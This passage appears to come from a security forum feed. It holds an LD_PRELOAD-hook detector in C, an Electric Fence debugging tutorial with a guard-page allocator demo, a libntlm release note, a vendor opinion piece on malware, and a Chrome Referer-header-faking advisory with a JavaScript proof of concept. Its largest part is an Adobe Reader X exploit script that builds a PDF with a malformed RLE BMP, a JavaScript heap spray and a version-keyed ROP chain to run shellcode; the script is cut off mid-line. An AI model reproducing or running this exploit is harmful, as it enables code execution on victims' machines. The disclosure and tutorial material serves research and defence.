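 * preloaded hook leaves behind. Every preloaded object is mapped into the process,
 * so its path appears in /proc/self/maps, and a hook library such as the article's
 * libhook.so normally lives outside the system library directories.
 * The trusted prefixes and the sample maps excerpt below are constructed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static const char *TRUSTED_PREFIXES[] = { "/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", NULL };
static char g_first_hit[4096];   /* first shared object found outside those prefixes */

/* Returns 1 when path begins with one of the trusted library prefixes. */
int path_is_trusted(const char *path)
{
    for (const char **p = TRUSTED_PREFIXES; *p != NULL; p++)
        if (strncmp(path, *p, strlen(*p)) == 0)
            return 1;
    return 0;
}

/* Copies the pathname column of one maps line into out. Returns 1 only for a file
 * mapping whose name contains ".so"; anonymous maps, [heap], [stack], [vdso] and the
 * main executable return 0. */
int maps_line_shared_object(const char *line, char *out, size_t outlen)
{
    const char *p = line;
    for (int col = 0; col < 5; col++) {              /* address perms offset dev inode */
        while (*p != '\0' && *p != ' ' && *p != '\n') p++;
        while (*p == ' ') p++;
    }
    if (*p != '/')
        return 0;
    size_t n = strcspn(p, "\n");
    if (n >= outlen) n = outlen - 1;
    memcpy(out, p, n);
    out[n] = '\0';
    return strstr(out, ".so") != NULL;
}

/* Counts shared objects mapped from outside the trusted prefixes. The segments of one
 * library sit on consecutive lines, so equal consecutive paths are counted once. */
int count_untrusted_objects(const char *maps_text)
{
    int count = 0;
    char last[4096] = "", path[4096];
    g_first_hit[0] = '\0';
    for (const char *line = maps_text; *line != '\0'; ) {
        if (maps_line_shared_object(line, path, sizeof path) && strcmp(path, last) != 0) {
            strcpy(last, path);
            if (!path_is_trusted(path)) {
                if (count == 0)
                    strcpy(g_first_hit, path);
                count++;
            }
        }
        const char *nl = strchr(line, '\n');
        line = nl ? nl + 1 : line + strlen(line);
    }
    return count;
}

const char *first_untrusted_hit(void) { return g_first_hit; }

/* The loader takes preload instructions from LD_PRELOAD (honoured only from trusted
 * directories for set-user-ID programs) and from the system-wide /etc/ld.so.preload.
 * Returns bit 0 for a non-empty variable, bit 1 for a non-empty file. */
int preload_configured(void)
{
    int found = 0;
    const char *env = getenv("LD_PRELOAD");
    if (env != NULL && *env != '\0')
        found |= 1;
    FILE *f = fopen("/etc/ld.so.preload", "r");
    if (f != NULL) {
        if (fgetc(f) != EOF)
            found |= 2;
        fclose(f);
    }
    return found;
}

/* Constructed excerpt modelled on the article's scenario: helloworld with libhook.so loaded. */
static const char SAMPLE_MAPS[] =
    "08048000-08049000 r-xp 00000000 08:01 393230 /home/sigma/code/helloworld\n"
    "b7e10000-b7fb0000 r-xp 00000000 08:01 131    /lib/i386-linux-gnu/libc-2.15.so\n"
    "b7fb0000-b7fb2000 r--p 0019f000 08:01 131    /lib/i386-linux-gnu/libc-2.15.so\n"
    "b7fb5000-b7fb6000 r-xp 00000000 08:01 393240 /home/sigma/code/libhook.so\n"
    "b7fb6000-b7fb7000 rw-p 00000000 08:01 393240 /home/sigma/code/libhook.so\n"
    "b7fc0000-b7fd0000 r-xp 00000000 08:01 120    /usr/lib/i386-linux-gnu/libssl.so.1.0.0\n"
    "bffdf000-c0000000 rw-p 00000000 00:00 0      [stack]\n";

int main(void)
{
    static char buf[1 << 16];
    FILE *f = fopen("/proc/self/maps", "r");
    size_t n = f ? fread(buf, 1, sizeof buf - 1, f) : 0;
    if (f) fclose(f);
    buf[n] = '\0';
    printf("preload configured: %d\n", preload_configured());
    printf("untrusted objects in this process: %d (%s)\n", count_untrusted_objects(buf), first_untrusted_hit());
    printf("constructed sample: %d untrusted (%s)\n", count_untrusted_objects(SAMPLE_MAPS), first_untrusted_hit());
    return 0;
}
```

Running the check under the article's `export LD_PRELOAD=...` shows both the environment bit and the mapped hook library; a statically linked binary shows neither, since the dynamic loader never runs for it.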
-
[h=1]Memory Corruption – Debugging Tools in Linux[/h]
by Rupali

In part I, we learnt about memory corruption and its probable causes. Presently, there is a plethora of Linux tools available to combat memory corruption issues. Such tools assist a great deal in detecting memory corruption and resolving it. In this article we will cover 3 popular open source tools available for debugging memory corruption related problems on Linux.

NOTE – Information related to installation of the debugging tools is Ubuntu specific.

[h=2]Memory Corruption Debugging Tools[/h]

[h=3]1. Electric Fence[/h]

Electric Fence is a memory debugger, sometimes also called a malloc debugger, as it detects memory corruption related to memory allocated by malloc(). It excels in detecting two kinds of programming issues related to heap memory corruption: the buffer overrun of a memory block allocated by 'malloc()', and access to memory that has already been freed by 'free()'. Electric Fence will detect even a read access, along with a write.

The way it helps is this: we run our executable in a debugger along with Electric Fence, and Electric Fence will make the program error at the point where either the buffer goes out of its malloc-ed bounds, or an already freed block is accessed. Hence, this way we come to know (from the error thrown by Electric Fence) which statement is attempting to corrupt memory. In all, the crash point is moved to the precise point of the first invalid memory write/read, helping us determine where the memory corruption is taking place. Put differently: with gdb alone we see the crash wherever it happens to occur, but with efence, the crash location changes to where the corruption happens.

To begin with, we will see how to set up Electric Fence. The following command installs the open source tool on an Ubuntu system.

[CODE]$ sudo apt-get install electric-fence[/CODE]

However, one can also install electric-fence through synaptic or aptitude.
Once installed, one can see that it is a library which contains overloaded definitions of malloc(), free(), calloc(), and other such memory related APIs which are generally available in libc. The way it works is that efence places an inaccessible page after each memory block allocated by 'malloc()', for which it has to use the virtual memory hardware of the system. Once we go beyond the allocated memory, the invalid access is noticed and the error is triggered.

To use Electric Fence, just compile the sources with the '-g' debug option and link them against the efence library. Let's take our old heap corruption example, which looks like this:

[CPP]#include <stdio.h>
#include <stdlib.h>

int main()
{
    int *pData = NULL;
    int num = 12;

    pData = (int*) malloc (num * sizeof (int));
    //...do stuff, use the memory
    free(pData);

    pData[0] = -1;    // write through a dangling pointer: the corruption efence should flag

    pData = (int*) malloc (num * sizeof (int));
    //...do stuff, use the memory
    free(pData);

    return 0;
}[/CPP]

Here is how we now compile the executable using efence:

[CODE]$ gcc -g -Wall heapcorrupt.c -o heapcorrupt -lefence[/CODE]

It's essential to understand that in the above linking we are asking the final built executable to use the symbols 'malloc' and 'free' from the libefence library rather than from libc. On my system, the libefence library is located at /usr/lib/. In certain cases, if gcc is still using the libc definitions, try giving the path to the library in the compilation options.

Let's confirm that our binary is using the required 'malloc' and 'free' symbols through the 'nm' tool, which lists all the symbols:

[CODE]$ nm -a heapcorrupt | grep malloc
                 U malloc[/CODE]

Articol complet: http://mylinuxbook.com/debugging-linux-memory-corruption/
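The guard-page mechanism the text describes, as an added example that is neither the article's nor Electric Fence's code: each block lives in its own mapping that ends at an inaccessible page, and freed blocks are made inaccessible rather than reused. The demo replays the accesses of heapcorrupt.c and reports which ones fault; the SIGSEGV trap is only there so the program can report instead of dying.

```c
/* Added example (not the article's or Electric Fence's code): the guard-page trick
 * efence relies on, reduced to a few functions. Each block lives in its own mapping
 * that ends at a PROT_NONE page; freed blocks are made inaccessible rather than reused,
 * so the first overrun or use-after-free faults exactly where it happens. */
#define _DEFAULT_SOURCE 1
#define _POSIX_C_SOURCE 200809L
#include <setjmp.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

static size_t page_round(size_t size)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    return (size + page - 1) / page * page;
}

/* Layout: [data pages][guard page]. The block ends exactly at the guard page, like
 * efence with EF_ALIGNMENT=0: even a one-byte overrun faults (with efence's default
 * word alignment a few slack bytes past the end would go unnoticed). */
void *guard_malloc(size_t size)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE), data = page_round(size);
    unsigned char *base = mmap(NULL, data + page, PROT_READ | PROT_WRITE,
                               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED)
        return NULL;
    if (mprotect(base + data, page, PROT_NONE) != 0) {
        munmap(base, data + page);
        return NULL;
    }
    return base + data - size;
}

/* Freed memory is never handed out again: the whole mapping becomes inaccessible so a
 * dangling pointer faults (efence's EF_PROTECT_FREE). The address range stays reserved. */
void guard_free(void *ptr, size_t size)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE), data = page_round(size);
    mprotect((unsigned char *)ptr - (data - size), data + page, PROT_NONE);
}

/* The trap below exists only so the demo can report a fault instead of dying. */
static sigjmp_buf fault_jump;
static void on_fault(int sig) { (void)sig; siglongjmp(fault_jump, 1); }

/* One byte access at addr (write if do_write, else read) under a SIGSEGV/SIGBUS trap.
 * Returns 1 if the access faulted, 0 if it completed normally. */
int access_faults(volatile unsigned char *addr, int do_write)
{
    struct sigaction sa, old_segv, old_bus;
    int faulted;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_fault;
    sa.sa_flags = SA_NODEFER;
    sigaction(SIGSEGV, &sa, &old_segv);
    sigaction(SIGBUS, &sa, &old_bus);
    if (sigsetjmp(fault_jump, 1) == 0) {
        if (do_write) *addr = 0xAA; else (void)*addr;
        faulted = 0;
    } else {
        faulted = 1;
    }
    sigaction(SIGSEGV, &old_segv, NULL);
    sigaction(SIGBUS, &old_bus, NULL);
    return faulted;
}

/* Replays the accesses of the article's heapcorrupt.c on the guard allocator.
 * Bit 0: write one element past the end caught; bit 1: write after free caught.
 * Returns -1 if allocation failed and -2 if a legitimate access faulted. */
int heapcorrupt_checks(void)
{
    size_t num = 12;
    int *pData = guard_malloc(num * sizeof(int));
    int caught = 0;
    if (pData == NULL)
        return -1;
    if (access_faults((volatile unsigned char *)&pData[num - 1], 1))
        return -2;                                  /* last valid element */
    if (access_faults((volatile unsigned char *)&pData[num], 1))
        caught |= 1;                                /* pData[12]: one past the end */
    guard_free(pData, num * sizeof(int));
    if (access_faults((volatile unsigned char *)&pData[0], 1))
        caught |= 2;                                /* pData[0] = -1 after free() */
    return caught;
}

int main(void)
{
    int r = heapcorrupt_checks();
    printf("overrun caught: %s, use-after-free caught: %s\n",
           (r & 1) ? "yes" : "no", (r & 2) ? "yes" : "no");
    return r == 3 ? 0 : 1;
}
```

The price of the technique is visible in the code: every allocation costs at least two pages, which is why efence is a debugging aid rather than a production allocator.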
-
NTLM Authentication Library 1.4
Authored by Grant Edwards | Site josefsson.org

The NTLM library contains utilities for authenticating against Microsoft servers that require NTLM authentication. The goal of this project is to make libntlm easier to build (by using autoconf, automake, and libtool) for use by other projects.

Download: http://packetstormsecurity.com/files/download/122321/libntlm-1.4.tar.gz

Sursa: NTLM Authentication Library 1.4 ≈ Packet Storm
-
[h=1]It's Too Late—Malware Has Already Won[/h]
Published: Friday, 5 Jul 2013 | 9:55 AM ET
By: Gaurav Banga, Co-founder and CEO of Bromium

Our society has never before had so much valuable data online, nor been so poorly protected. The barbarians are at the gate. To change the odds, chief information security officers (CISOs) will need to do things differently, take a few risks and adopt new approaches to secure the enterprise. The current approach has failed, and "more of the same" will not suffice.

The CISO of a Fortune 50 company recently shared with me that their approach to solve the problem of advanced persistent threats was to "mandate two of every security product from different vendors," from firewalls to intrusion detection and prevention systems—and in doing so gain "defense in depth." Certainly the organization doubled its costs, but is it now measurably more secure? No.

"Defense in depth" is a term used too often in hope, when in fact we are facing a "phase shift" in the technology and approaches used by attackers. Imagine that you have a pot of water on the stove. It gets hotter and hotter, but it's still water. But there's a fascinating point where the addition of a single joule of energy transforms water to steam: a phase shift. If your approach involves finding ways to contain water (bigger/better pots, for example) a phase shift to steam is a very big deal. In fact, you're probably out of luck.

The water in our pot has turned to steam and is escaping: It is impossible to build a malware detector that can keep up with advanced polymorphic malware—either at the network perimeter, or at the endpoint. This is a simple restatement of the Halting Problem, proven in 1936 by Alan Turing (who is considered to be the father of the field of computer science)—there can be no general procedure to decide if a self-contained computer program will eventually halt. Moreover, detection is vastly different from protection.
Putting a lid on the pot will not contain the steam, and might well lead to an explosion. Many enterprise compromises that are discovered are found weeks or months after the attack—giving attackers plenty of time to further penetrate the infrastructure and steal data.

We need a phase shift in our approach to the problem of endpoint security. Every device must be able to protect itself "in the wild"—away from the traditional enterprise network perimeter. Users are increasingly mobile, accessing applications from untrusted networks and over the Web, and will make mistakes and click on the wrong things. And a broader trend, toward consumerization of the endpoint, means that user-owned devices will increasingly be used for work.

The phase shift that is needed will deliver endpoints that are secure by design. This will result from hardware enforced isolation, rather than from software-based detection. Hardware-protected devices can use attestation to ensure that an endpoint initializes to a known-good state. In addition, new approaches, such as Bromium micro-virtualization, allow hardware to protect applications, the operating system and data at runtime, to extract and analyze malware for incident response, and to make endpoints self-remediating.

The enterprise security landscape is changing profoundly. CISOs must take bold steps forward to adopt new practices to dramatically reduce enterprise insecurity: new OS versions, automated OS and application patching, encryption, and hardware-based protection are vital in a consumer oriented world where devices access cloud-based applications directly, and where the attacker has access to massive computing power.

—By Gaurav Banga, co-founder and CEO of Bromium.

Sursa: It's Too Late—Malware Has Already Won
-
Google Chrome 25.0.1364.152 HTTP Referer Header Faking
Authored by Liad Mizrachi

Advisory: XMLHttpRequest HTTP Referer Header Faking
Author: Liad Mizrachi
Vendor URL: http://www.chromium.org/
Vulnerability Status: Fixed
Application Version: Google Chrome v25.0.1364.152

==========================
Vulnerability Description
==========================
Chromium is the open source web browser project from which Google Chrome draws its source code. Chromium fails to validate the use of unsafe headers when the page is loaded from the local drive, allowing a script to set and change the Referer header using "setRequestHeader" when generating an Ajax (XMLHttpRequest) request.

==========================
PoC
==========================
[JS]function SendReq() {
    var xmlHttp = new XMLHttpRequest();
    xmlHttp.onreadystatechange = readyStateChanged;
    xmlHttp.open("GET", "http://AnySite.com/checkReferer.php", true);
    xmlHttp.setRequestHeader("Referer", "http://valid.referer.com");
    xmlHttp.send();
}[/JS]

==========================
Solution
==========================
Block all scripts from setting unsafe headers in XMLHttpRequest.
- Fixed by vendor.

==========================
Disclosure Timeline
==========================
04-Mar-2013 - Google Security Team informed by mail.
14-Mar-2013 - Google Security Team Reply: "Since ChromeOS is an open source project, please file the report directly in their bug tracker"
14-Mar-2013 - Security Bug Opened @ Chromium project.
30-Apr-2013 - Fixed.

==========================
References
==========================
http://www.chromium.org/
https://codereview.chromium.org/13979011/

Sursa: Google Chrome 25.0.1364.152 HTTP Referer Header Faking ≈ Packet Storm
-
[h=1]Adobe Reader X 10.1.4.38 - BMP/RLE Heap Corruption[/h] ''' Title: Adobe Reader X BMP/RLE heap corruption Product: Adobe Reader X Version: 10.x Product Homepage: adobe.com Binary affected: AcroForm.api Binary Version: 10.1.4.38 Binary MD5: 8e0fc0c6f206b84e265cc3076c4b9841 Configuration Requirements ----------------------------------------- Default configuration. Vulnerability Requirements ----------------------------------------- None. Vulnerability Description ----------------------------------------- Adobe Reader X fails to validate the input when parsing an embedded BMP RLE encoded image. Arbitrary code execution in the context of the sandboxed process is proved possible after a malicious embeded bmp image triggers a heap overflow. Vulnerability WorkAround (if possible) ----------------------------------------- Delete AcroForm.api ''' from hashlib import md5 import sys, struct ######### Begin of the miniPDF import zlib #For constructing a minimal pdf file ## PDF REference 3rd edition:: 3.2 Objects class PDFObject: def __init__(self): self.n=None self.v=None def __str__(self): raise Exception("Fail") ## PDF REference 3rd edition:: 3.2.1 Booleans Objects class PDFBool(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): if self.s: return "true" return "false" ## PDF REference 3rd edition:: 3.2.2 Numeric Objects class PDFNum(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): return "%s"%self.s ## PDF REference 3rd edition:: 3.2.3 String Objects class PDFString(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): return "(%s)"%self.s ## PDF REference 3rd edition:: 3.2.3 String Objects / Hexadecimal Strings class PDFHexString(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): return "<" + "".join(["%02x"%ord(c) for c in self.s]) + ">" ## A convenient type of literal Strings class PDFOctalString(PDFObject): def 
__init__(self,s): PDFObject.__init__(self) self.s="".join(["\\%03o"%ord(c) for c in s]) def __str__(self): return "(%s)"%self.s ## PDF REference 3rd edition:: 3.2.4 Name Objects class PDFName(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): return "/%s"%self.s ## PDF REference 3rd edition:: 3.2.5 Array Objects class PDFArray(PDFObject): def __init__(self,s): PDFObject.__init__(self) assert type(s) == type([]) self.s=s def append(self,o): self.s.append(o) return self def __str__(self): return "[%s]"%(" ".join([ o.__str__() for o in self.s])) ## PDF REference 3rd edition:: 3.2.6 Dictionary Objects class PDFDict(PDFObject): def __init__(self, d={}): PDFObject.__init__(self) self.dict = {} for k in d: self.dict[k]=d[k] def __iter__(self): for k in self.dict.keys(): yield k def __iterkeys__(self): for k in self.dict.keys(): yield k def __getitem__(self, key): return self.dict[key] def add(self,name,obj): self.dict[name] = obj def get(self,name): if name in self.dict.keys(): return self.dict[name] else: return None def __str__(self): s="<<" for name in self.dict: s+="%s %s "%(PDFName(name),self.dict[name]) s+=">>" return s ## PDF REference 3rd edition:: 3.2.7 Stream Objects class PDFStream(PDFDict): def __init__(self,d={},stream=""): PDFDict.__init__(self,d) self.stream=stream self.filtered=self.stream self.add('Length', len(stream)) self.filters = [] def appendFilter(self, filter): self.filters.append(filter) self._applyFilters() #yeah every time .. so what! def _applyFilters(self): self.filtered = self.stream for f in self.filters: self.filtered = f.encode(self.filtered) if len(self.filters)>0: self.add('Length', len(self.filtered)) self.add('Filter', PDFArray([f.name for f in self.filters])) #Add Filter parameters ? def __str__(self): self._applyFilters() #yeah every time .. so what! 
s="" s+=PDFDict.__str__(self) s+="\nstream\n" s+=self.filtered s+="\nendstream" return s ## PDF REference 3rd edition:: 3.2.8 Null Object class PDFNull(PDFObject): def __init__(self): PDFObject.__init__(self) def __str__(self): return "null" ## PDF REference 3rd edition:: 3.2.9 Indirect Objects class UnResolved(PDFObject): def __init__(self,n,v): PDFObject.__init__(self) self.n=n self.v=v def __str__(self): return "UNRESOLVED(%d %d)"%(self.n,self.v) class PDFRef(PDFObject): def __init__(self,obj): PDFObject.__init__(self) self.obj=[obj] def __str__(self): if len(self.obj)==0: return "null" return "%d %d R"%(self.obj[0].n,self.obj[0].v) ## PDF REference 3rd edition:: 3.3 Filters ## Example Filter... class FlateDecode: name = PDFName('FlateDecode') def __init__(self): pass def encode(self,stream): return zlib.compress(stream) def decode(self,stream): return zlib.decompress(stream) ## PDF REference 3rd edition:: 3.4 File Structure ## Simplest file structure... class PDFDoc(): def __init__(self,obfuscate=0): self.objs=[] self.info=None self.root=None def setRoot(self,root): self.root=root def setInfo(self,info): self.info=info def _add(self,obj): if obj.v!=None or obj.n!=None: raise Exception("Already added!!!") obj.v=0 obj.n=1+len(self.objs) self.objs.append(obj) def add(self,obj): if type(obj) != type([]): self._add(obj); else: for o in obj: self._add(o) def _header(self): return "%PDF-1.5\n%\xE7\xF3\xCF\xD3\n" def __str__(self): doc1 = self._header() xref = {} for obj in self.objs: xref[obj.n] = len(doc1) doc1+="%d %d obj\n"%(obj.n,obj.v) doc1+=obj.__str__() doc1+="\nendobj\n" posxref=len(doc1) doc1+="xref\n" doc1+="0 %d\n"%(len(self.objs)+1) doc1+="0000000000 65535 f \n" for xr in xref.keys(): doc1+= "%010d %05d n \n"%(xref[xr],0) doc1+="trailer\n" trailer = PDFDict() trailer.add("Size",len(self.objs)+1) if self.root == None: raise Exception("Root not set!") trailer.add("Root",PDFRef(self.root)) if self.info: trailer.add("Info",PDFRef(self.info)) 
doc1+=trailer.__str__() doc1+="\nstartxref\n%d\n"%posxref doc1+="%%EOF" return doc1 ######### End of miniPDF SLIDESIZE=0x12C def mkBMP(payload, exception=True): bmp = '' #getInfoHeader bfType = 0x4d42 assert bfType in [0x4d42,0x4349,0x5043,0x4943,0x5043] #0x4142: not supp bmp += struct.pack('<H', bfType) bfSize = 0 bfOffBits = 0 bmp += struct.pack('<L', bfSize) bmp += struct.pack('<H', 0) #Reserved1 bmp += struct.pack('<H', 0) #Reserved2 bmp += struct.pack('<L', bfOffBits) biSize = 0x40 assert not biSize in [0x12] bmp += struct.pack('<L', biSize) biHeight = 1 biWidth = SLIDESIZE #size of texture structure LFH enabled biPlanes = 1 biBitCount = 8 biCompression = 1 biSizeImage = 0 biXPelsPerMeter = 0 biYPelsPerMeter = 0 biClrUsed = 2 if biClrUsed >0xff: raise "BUG!!!!" biClrImportant = 0 bmp += struct.pack('<L', biWidth) bmp += struct.pack('<L', biHeight) bmp += struct.pack('<H', biPlanes) bmp += struct.pack('<H', biBitCount) bmp += struct.pack('<L', biCompression) bmp += struct.pack('<L', biSizeImage) bmp += struct.pack('<L', biXPelsPerMeter) bmp += struct.pack('<L', biYPelsPerMeter) bmp += struct.pack('<L', biClrUsed) bmp += struct.pack('<L', biClrImportant) bmp += 'A'*(biSize-0x40) #pad numColors=biClrUsed if biClrUsed == 0 or biBitCount < 8: numColors = 1<<biBitCount; bmp += 'RGBA'*(numColors) #pallete bmp += '\x00\x02\xff\x00' * ((0xffffffff-0xff) / 0xff) #while (len(bmp)+10)%0x400 != 0: # bmp += '\x00\x02\x00\x00' assert len(payload) < 0x100 and len(payload) >= 3 bmp += '\x00\x02'+chr(0x100-len(payload))+'\x00' bmp += '\x00'+chr(len(payload))+payload if len(payload)&1 : bmp += 'P' if exception: bmp += '\x00\x02\x00\xff'*10 #getting the pointer outside the texture so it triggers an exception bmp += '\x00'+chr(10)+'X'*10 else: bmp += '\x00\x01' #'\x04X'*(biWidth+2000)+"\x00\x02" return bmp def UEncode(s): r = '' s += '\x00'*(len(s)%2) for i in range(0,len(s),2): r+= '\\u%04x'%(struct.unpack('<H', (s[i:i+2]))[0]) return r r = '' for c in s: r+= '%%%02x'%ord(c) 
return r def mkXFAPDF(shellcode = '\x90'*0x400+'\xcc'): xdp = ''' <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/" timeStamp="2012-11-23T13:41:54Z" uuid="0aa46f9b-2c50-42d4-ab0b-1a1015321da7"> <template xmlns:xfa="http://www.xfa.org/schema/xfa-template/3.1/" xmlns="http://www.xfa.org/schema/xfa-template/3.0/"> <?formServer defaultPDFRenderFormat acrobat9.1static?> <?formServer allowRenderCaching 0?> <?formServer formModel both?> <subform name="form1" layout="tb" locale="en_US" restoreState="auto"> <pageSet> <pageArea name="Page1" id="Page1"> <contentArea x="0.25in" y="0.25in" w="576pt" h="756pt"/> <medium stock="default" short="612pt" long="792pt"/> <?templateDesigner expand 1?> </pageArea> <?templateDesigner expand 1?> </pageSet> <variables> <script name="util" contentType="application/x-javascript"> // Convenience functions to pack and unpack litle endian an utf-16 strings function pack(i){ var low = (i & 0xffff); var high = ((i>>16) & 0xffff); return String.fromCharCode(low)+String.fromCharCode(high); } function unpackAt(s, pos){ return s.charCodeAt(pos) + (s.charCodeAt(pos+1)<<16); } function packs(s){ result = ""; for (i=0;i<s.length;i+=2) result += String.fromCharCode(s.charCodeAt(i) + (s.charCodeAt(i+1)<<8)); return result; } function packh(s){ return String.fromCharCode(parseInt(s.slice(2,4)+s.slice(0,2),16)); } function packhs(s){ result = ""; for (i=0;i<s.length;i+=4) result += packh(s.slice(i,i+4)); return result; } var verbose = 1; function message(x){ if (util.verbose == 1 ) xfa.host.messageBox(x); } //ROP0 //7201E63D XCHG EAX,ESP //7201E63E RETN //ROP1 //7200100A JMP DWORD PTR DS:[KERNEL32.GetModuleHandle] //ROP2 //7238EF5C PUSH EAX //7238EF5D CALL DWORD PTR DS:[KERNEL32.GetProcAddress] //7238EF63 TEST EAX,EAX //7238EF65 JNE SHORT 7238EF84 //7238EF84 POP EBP //7238EF85 RETN 4 //ROP3 //72001186 JMP EAX ; kernel32.VirtualProtect //ROP4 //72242491 ADD ESP,70 //72242494 RETN var _offsets = {'Reader": { "10.104": { "acrord32": 0xA4, "rop0": 0x1E63D, "rop1": 
0x100A, "rop2": 0x38EF5C, "rop3": 0x1186, "rop4": 0x242491, }, "10.105": { // Added by Eddie Mitchell "acrord32": 0xA5, "rop0": 0x1E52D, "rop1": 0x100A, "rop2": 0x393526, "rop3": 0x1186, "rop4": 0x245E71, }, "10.106": { // Added by Eddie Mitchell "acrord32": 0xA5, "rop0": 0x1E52D, "rop1": 0x100A, "rop2": 0x393526, "rop3": 0x1186, "rop4": 0x245E71, }, }, "Exchange-Pro": { "10.105": { // Added by Eddie Mitchell "acrobat": 0xCD, "rop0": 0x3720D, "rop1": 0x100A, "rop2": 0x3DCC91, "rop3": 0x180F, "rop4": 0x25F2A1, }, }, }; function offset(x){ //app.viewerType will be "Reader" for Reader, //"Exchange" for Acrobat Standard or "Exchange-Pro" for Acrobat Pro try { return _offsets[app.viewerType][app.viewerVersion][x]; } catch (e) { xfa.host.messageBox("Type:" +app.viewerType+ " Version: "+app.viewerVersion+" NOT SUPPORTED!"); } return 0x41414141; } </script> <script name="spray" contentType="application/x-javascript"> // Global variable for spraying var slide_size=%%SLIDESIZE%%; var size = 200; var chunkx = "%%MINICHUNKX%%"; var x = new Array(size); var y = new Array(size); var z = new Array(size); var pointers = new Array(100); var done = 0; </script> <?templateDesigner expand 1?> </variables> <subform w="576pt" h="756pt"> <!-- This image fiel hold the cashing image --> <field name="ImageCrash"> <ui> <imageEdit/> </ui> <value> <image aspect="actual" contentType="image/jpeg">%%BMPFREELFH%%</image> </value> </field> </subform> <event activity="initialize" name="event__initialize"> <script contentType="application/x-javascript"> // This script runs at the very beginning and // is used to prepare the memory layout util.message("Initialize"); var i; var j; if (spray.done == 0){ //Trigger LFH use var TOKEN = "\u5858\u5858\u5678\u1234"; var chunk_len = spray.slide_size/2-1-(TOKEN.length+2+2); for (i=0; i < spray.size; i+=1) spray.x[i] = TOKEN + util.pack(i) + spray.chunkx.substring(0, chunk_len) + util.pack(i) + ""; util.message("Initial spray done!"); for (j=0; j < size; j++) 
for (i=spray.size-1; i > spray.size/4; i-=10) spray.x[i]=null; spray.done = 1; util.message("Generating holes done!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"); } // After this the form layout is rendered and the bug triggered </script> </event> <event activity="docReady" ref="$host" name="event__docReady"> <script contentType="application/x-javascript"> // This script runs once the page is ready util.message("DocReady"); var i; var j; var found = -1; // Index of the overlapped string var acro = 0; // Base of the AcroRd32_dll // Search over all strings for the first one with the broken TOKEN for (i=0; i < spray.size; i+=1) if ((spray.x[i]!=null) && (spray.x[i][0] != "\u5858")){ found = i; acro = (( util.unpackAt(spray.x[i], 14) >> 16) - util.offset("acrord32")) << 16; util.message("Found! String number "+ found + " has been corrupted acrord32.dll:" + acro.toString(16) ); break; } // Behaviour is mostly undefined if not found if (found == -1){ util.message("Corrupted String NOT Found!"); event.target.closeDoc(true); } // Corrupted string was found let's generates the new // string for overlapping the struct before freeing it var chunky = ""; for (i=0; i < 7; i+=1) chunky += util.pack(0x41414141); chunky += util.pack(0x10101000); while (chunky.length < spray.slide_size/2) chunky += util.pack(0x58585858); // Free the overlapping string util.message("Feeing corrupted string! Previous string will we used-free ("+(found)+")"); for (j=0; j < 100000; j++) spray.x[found-1]=spray.x[found]=null; // Trigger several allocs that will fall over the structure for (i=0; i < 200; i+=1){ ID = "" + i; spray.y[i] = chunky.substring(0,spray.slide_size/2-ID.length) + ID+ ""; } util.message("Allocated 20 chunks-y\\n"); // Heap spraying make's baby jesus cry! 
// Construct the 0x1000 small chunk for spraying var obj = 0x10101000; var pointer_slide = ""; pointer_slide += util.pack(acro+util.offset("rop4")); //add esp,70;ret for (i=0; i < 27; i+=1) pointer_slide += util.pack(0x41414141); obj += pointer_slide.length*2; // ROP pointer_slide += util.pack(acro+util.offset("rop0")); //XCHG EAX,ESP;ret pointer_slide += util.pack(acro+util.offset("rop1")); //0x100A jmp getmodule pointer_slide += util.pack(acro+util.offset("rop2")); //@0x04 - getProcAddress pointer_slide += util.pack(obj+0xDC); //@0x08 point to KERNEL32 //@0x10 pointer_slide += util.pack(obj+0xCC); pointer_slide += util.pack(0x43434343); // POPPED TO EBP pointer_slide += util.pack(acro+util.offset("rop3")); // JMP EAX pointer_slide += util.pack(obj); //Points to offset 0 of this //@0x20 pointer_slide += util.pack(obj+0x38); pointer_slide += util.pack(obj+0x38); pointer_slide += util.pack(0x1000); //SIZE_T dwSize, pointer_slide += util.pack(0x40); // DWORD flNewProtect, //0x30 pointer_slide += util.pack(obj+0x34); //PDWORD lpflOldProtect pointer_slide += util.pack(0x00000000); //DWORD OldProtect pointer_slide += util.packhs("E9B1000000909090"); //0x40 pointer_slide += util.pack(acro); //Used by next stage pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); //0x50 pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); //0x60 pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); //0x70 pointer_slide += util.pack(acro); pointer_slide += util.pack(0x48484848); pointer_slide += util.pack(0x49494949); pointer_slide += util.pack(0x49494949); //0x80 pointer_slide += util.pack(0x49494949); pointer_slide += util.pack(0x50505050); pointer_slide += util.pack(0x46464646); pointer_slide += 
